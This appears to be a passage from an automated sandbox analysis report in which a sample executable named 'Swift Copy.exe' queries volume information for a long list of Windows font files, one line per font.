Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
